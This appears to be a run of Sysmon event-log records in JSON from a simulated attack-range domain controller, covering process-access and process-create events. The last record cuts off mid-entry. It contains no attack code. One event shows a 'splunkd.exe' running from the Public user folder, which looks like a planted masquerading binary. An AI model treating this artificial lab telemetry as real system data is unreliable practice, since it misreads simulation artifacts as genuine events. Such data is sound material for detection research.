{"EventTime":"2020-08-01 06:49:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1998,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:18.677\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:18.677","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:49:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1999,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:18.715\r\nProcessGuid: {E2A3D6B1-106E-5F25-0000-00100FE80300}\r\nProcessId: 4036\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nFileVersion: 8.0.2\r\nDescription: splunkd service\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunkd.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd\" check-transforms-keys\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589\r\nParentProcessGuid: {E2A3D6B1-106D-5F25-0000-001067C70300}\r\nParentProcessId: 3896\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal pre-flight-checks --answer-yes --no-prompt ","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:49:18.715","ProcessGuid":"{E2A3D6B1-106E-5F25-0000-00100FE80300}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","FileVersion":"8.0.2","Description":"splunkd service","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunkd.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd\" check-transforms-keys","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589","ParentProcessGuid":"{E2A3D6B1-106D-5F25-0000-001067C70300}","ParentProcessId":"3896","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal pre-flight-checks --answer-yes --no-prompt ","EventReceivedTime":"2020-08-01 06:49:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2000,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:18.708\r\nSourceProcessGUID: {E2A3D6B1-106D-5F25-0000-001067C70300}\r\nSourceProcessId: 3896\r\nSourceThreadId: 3920\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nTargetProcessGUID: {E2A3D6B1-106E-5F25-0000-00100FE80300}\r\nTargetProcessId: 4036\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4022c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+403f8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+404c7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+40fee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+18226|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:18.708","SourceProcessGUID":"{E2A3D6B1-106D-5F25-0000-001067C70300}","SourceProcessId":"3896","SourceThreadId":"3920","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","TargetProcessGUID":"{E2A3D6B1-106E-5F25-0000-00100FE80300}","TargetProcessId":"4036","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4022c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+403f8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+404c7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+40fee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+18226|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2001,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:18.708\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-106E-5F25-0000-00100FE80300}\r\nTargetProcessId: 4036\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:18.708","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-106E-5F25-0000-00100FE80300}","TargetProcessId":"4036","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:49:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2002,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:18.708\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:18.708","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2003,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:18.708\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:18.708","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2004,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:18.708\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:18.708","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2005,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:18.708\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:18.708","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2006,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:18.708\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 